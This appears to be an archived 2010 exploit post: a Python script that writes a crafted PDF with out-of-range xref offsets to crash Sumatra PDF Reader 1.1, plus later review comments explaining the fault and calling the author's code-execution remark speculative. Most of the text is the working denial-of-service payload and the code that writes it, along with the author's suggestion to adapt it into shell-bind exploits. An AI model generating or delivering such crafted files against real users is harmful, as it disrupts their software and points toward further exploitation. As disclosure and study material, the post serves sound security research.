sumatrapdf-dos.txt
Posted on 01 July 2010
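###########################################################################
###########################################################################
######## SUMATRA PDF READER version 1.1 (CRASHER) DoS File Creator ########
###########################################################################
# Vulnerability Detection Time : 21st June 2010, 1:13 AM
# Tested on version 1.1 of Sumatra PDF Reader
# Nature : Accidental Discovery
###########################################################################
# Description : Sumatra PDF Reader crashed while testing recovered PDF
#               Files from a HardDisk. PDF Files recovered using Forensic
#               Tools were large in size. DoS code has been optimised to
#               implement the crash with reduced file-size.
# Notes : This source can be modified after analyzing the crash appcompat
#         files to write shell bind / other payloaded exploits.
#         Sumatra PDF Reader crashed when PDF Files were already
#         associated to launch it.
#
# Thanks to Felicity. Hope you got your files back :-)
###########################################################################
# Vulnerability Discoverer : Azim Poonawala [ QUAKERDOOMER ]
# Email : quakerdoomer [ @ ] fmguy.com
###########################################################################
###########################################################################
#
# NOTE(review): what this page demonstrates is a crash (denial of service)
# of version 1.1 only. The remark above about adapting the file into a
# code-execution exploit is the author's speculation; nothing here shows the
# crash to be exploitable. The page names no fixed release, so confirm the
# fix status against the vendor's release notes before treating an
# installation as unaffected.

#!/usr/bin/python
# Usage: python sumatra_pdf_v1.1_DoS_file.py

# Raw bytes of the crafted PDF. The file opens with a "%PDF-1.4" header and a
# linearization dictionary that declares a total length of 18719 bytes
# (/L 18719); the xref table lists object offsets up to 14726. The payload
# written here is under 1 KB, so most declared offsets point past the end of
# the file.
# NOTE(review): presumably the reader fails while following those
# out-of-range offsets; the page does not identify the faulting code. A
# robust parser rejects any offset beyond the actual file size.
data = (
    b"\x25\x50\x44\x46\x2D\x31\x2E\x34\x0D\x25\xE2\xE3\xCF\xD3\x0D\x0A"
    b"\x36\x20\x30\x20\x6F\x62\x6A\x3C\x3C\x2F\x48\x5B\x36\x37\x36\x20"
    b"\x31\x35\x37\x5D\x2F\x4C\x69\x6E\x65\x61\x72\x69\x7A\x65\x64\x20"
    b"\x31\x2F\x45\x20\x31\x34\x38\x30\x32\x2F\x4C\x20\x31\x38\x37\x31"
    b"\x39\x2F\x4E\x20\x31\x2F\x4F\x20\x39\x2F\x54\x20\x31\x38\x35\x35"
    b"\x33\x3E\x3E\x0D\x65\x6E\x64\x6F\x62\x6A\x0D\x20\x20\x20\x20\x20"
    b"\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
    b"\x20\x20\x0D\x0A\x78\x72\x65\x66\x0D\x0A\x36\x20\x31\x39\x0D\x0A"
    b"\x30\x30\x30\x30\x30\x30\x30\x30\x31\x36\x20\x30\x30\x30\x30\x30"
    b"\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x38\x33\x33\x20\x30"
    b"\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x36"
    b"\x37\x36\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30"
    b"\x30\x30\x30\x39\x30\x39\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A"
    b"\x30\x30\x30\x30\x30\x30\x31\x30\x33\x38\x20\x30\x30\x30\x30\x30"
    b"\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x31\x32\x32\x39\x20\x30"
    b"\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x31\x36"
    b"\x38\x36\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30"
    b"\x30\x30\x32\x30\x39\x30\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A"
    b"\x30\x30\x30\x30\x30\x30\x32\x31\x32\x34\x20\x30\x30\x30\x30\x30"
    b"\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x32\x31\x36\x38\x20\x30"
    b"\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x33\x39"
    b"\x34\x30\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30"
    b"\x30\x30\x34\x33\x33\x30\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A"
    b"\x30\x30\x30\x30\x30\x30\x36\x39\x39\x39\x20\x30\x30\x30\x30\x30"
    b"\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x37\x37\x35\x39\x20\x30"
    b"\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x37\x39"
    b"\x39\x38\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30"
    b"\x30\x30\x38\x32\x34\x33\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A"
    b"\x30\x30\x30\x30\x30\x30\x38\x34\x39\x38\x20\x30\x30\x30\x30\x30"
    b"\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x31\x31\x34\x30\x32\x20\x30"
    b"\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x31\x34\x37"
    b"\x32\x36\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x74\x72\x61\x69"
    b"\x6C\x65\x72\x0D\x0A\x3C\x3C\x2F\x53\x69\x7A\x65\x20\x32\x35\x2F"
    b"\x50\x72\x65\x76\x20\x31\x38\x35\x34\x33\x2F\x52\x6F\x6F\x74\x20"
    b"\x37\x20\x30\x20\x52\x2F\x49\x6E\x66\x6F\x20\x35\x20\x30\x20\x52"
    b"\x2F\x49\x44\x5B\x3C\x33\x64\x32\x38\x34\x30\x64\x30\x39\x37\x36"
    b"\x61\x37\x66\x32\x61\x37\x30\x34\x31\x37\x32\x36\x65\x37\x30\x38"
    b"\x33\x38\x31\x62\x30\x3E\x3C\x65\x39\x35\x37\x38\x32\x63\x37\x34"
    b"\x36\x62\x38\x34\x39\x34\x64\x39\x62\x39\x37\x31\x33\x30\x38\x37"
    b"\x31\x38\x33\x36\x62\x34\x39\x3E\x5D\x3E\x3E\x0D\x0A\x73\x74\x61"
    b"\x72\x74\x78\x72\x65\x66\x0D\x0A\x30\x0D\x0A\x25\x25\x45\x4F\x46"
    b"\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
    b"\x20\x20\x0D\x0A\x38\x20\x30\x20\x6F\x62\x6A\x3C\x3C\x2F\x4C\x65"
    b"\x6E\x67\x74\x68\x20\x38\x30\x2F\x46\x69\x6C\x74\x65\x72\x2F\x46"
    b"\x6C\x61\x74\x65\x44\x65\x63\x6F\x64\x65\x2F\x4C\x20\x39\x30\x2F"
    b"\x53\x20\x34\x30\x3E\x3E\x73\x74\x72\x65\x61\x6D\x0D\x0A\x78\xDA"
    b"\x62\x60\x60\x10\x60\x60\x60\xFA\xC0\x20\x04\x66\xAE\x0C\xA8\x80"
    b"\x19\x88\x59\x18\x38\x16\x80\xD5\xC0\x81\x20\x03\x8C\xAF\xC4\xC0"
    b"\xC3\xFA\x61\xAE\x54\x61\x11\x03\x03\x57\xCE\xC2\x94\x25\x9B\xAE"
    b"\xF1\x5C\xB8\xCC\x7B\xDB\xEC\xEC\x02\x2D\xB0\x3C\x23\x03\x83\xA5"
    b"\x29\x90\x66\x02\x62\x0B\x80\x20\x03\x20\x10\xE9\x0D\xCE\x0D\x0A"
    b"\x65\x6E\x64\x73\x74\x72\x65\x61\x6D\x0D\x65\x6E\x64\x6F\x62\x6A"
    b"\x0D\x37\x20\x30\x20\x6F\x62\x6A\x3C\x3C\x2F\x50\x61\x67\x65\x73"
    b"\x20\x33\x20\x30\x20\x52\x2F\x54\x79\x70\x65\x2F\x43\x61\x74\x61"
    b"\x6C\x6F\x67\x2F\x50\x61\x67\x65\x4C\x61\x62\x65\x6C\x73\x20\x31"
    b"\x20\x30\x20\x52\x2F\x4D\x65\x74\x61\x64\x61\x74\x61\x20\x34\x20"
    b"\x30\x20\x52\x3E\x3E\x0D\x65\x6E\x64\x6F\x62\x6A"
)

try:
    # Binary mode: the payload is raw PDF bytes. Text mode ("w") would rewrite
    # every 0x0A byte on platforms that translate line endings, changing the
    # stream and the offsets, and it rejects bytes outright on Python 3.
    # The context manager closes the handle even if the write fails.
    with open("SumatraPDF_Reader_1.1_crasher_DoS.pdf", "wb") as f1:
        f1.write(data)
except (IOError, OSError) as exc:
    # Report why the file could not be written instead of a bare "Error";
    # only I/O failures are caught so that programming errors still surface.
    print("Error: %s" % exc)
else:
    # Per the author's note, the crash was seen only when the file was opened
    # through the PDF file association, not through File/Open in a running
    # reader.
    print(
        " PDF file created ! : [SumatraPDF_Reader_1.1_crasher_DoS.pdf]"
        " Launch it to run under Sumatra PDF Reader v1.1 to test crash."
        " NOTE : Launching Sumatra PDF Reader and then using File/Open Ctrl+O"
        " to open this file WON'T cause a DoS "
    )
    print(
        "Written by : Azim Poonawala (QUAKERDOOMER)"
        " [ quakerdoomer [ @ ] fmguy.com ]"
        " http:/solidmecca.co.nr http://winautopwn.co.nr"
        " http://my.opera.com/quakerdoomer"
    )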